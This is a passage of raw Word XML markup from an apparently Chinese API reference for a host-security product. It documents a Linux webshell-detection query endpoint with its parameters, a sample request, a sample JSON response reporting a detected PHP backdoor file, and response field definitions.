              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40A73C82" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AC9100E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E79D834" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28A4102A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E4AEAC7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B1D95B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09050A30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21648737" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="182755B8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="390CE42A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E99EEFB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3271F737" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5925BF43" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7EC15670" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3810284B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>types</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EE6A4C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="514C56D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78AC22D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6AD5EA18" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A1DF9B3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B014156" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A345D02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15E0C443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3237B455" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B829DEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CF11C4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58D7D7AB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B799435" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>域名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="10B8F2BA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E0DFD1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>filePath</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19B43261" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30FD7BD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0784E7B0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="22448E5B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B160928" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/api/websecurity/webshell/linux?page=0&amp;size=50&amp;groups=1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576A240A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF56BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "agentId": "70db8ef89e9ae79a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.231",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.159.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "hostname",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "id": "5a5dd69c7d761b24f3ea04c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": 5,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "typeDesc": "已知后门",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName": "www.zhn.com",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "filePath": "/home/qt/nan/ii.php",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "fileMd5": "112378feba9a9ba493a1d0bd0acfb180",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "fileSize": 16,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "regexDesc": "PHP WebShell特征码",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "matchCount": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "modifyTime": 1505122390,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "whiteRuleEffect": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B308FBB"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694"/>
        <w:gridCol w:w="1006"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="3169"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="46F455A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106E881" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4112622C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794D0C7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE54E2A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="345B99EE" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2686006B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DCAD72B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AD85B4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40EF389C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6D50AC04" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392D1076" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10DD3FE8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E9743C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="211CEA2E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DE8272E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AE41654" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B397E8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57B84ECC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54B3B9B5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="034AD7FD" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E33BBB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41B4670B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40E1E07F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="346E3743" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5CEE4001" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="694CC5CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="414D087D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="434B8B09" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4421BA20" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7E123D3F" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1A5329" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BF51BD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="053A000B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D206011" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="06F972F0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CC48842" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AAC14E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="76A9F1D2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70AF0FAE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="55E420D5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ABB03E2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6390AC66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4032A0D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71514580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="02D84891" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BCC636C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B0EEA1E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66387077" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E3F70D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A42D20C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E648418" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="312C6703" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F78A3DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223299CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
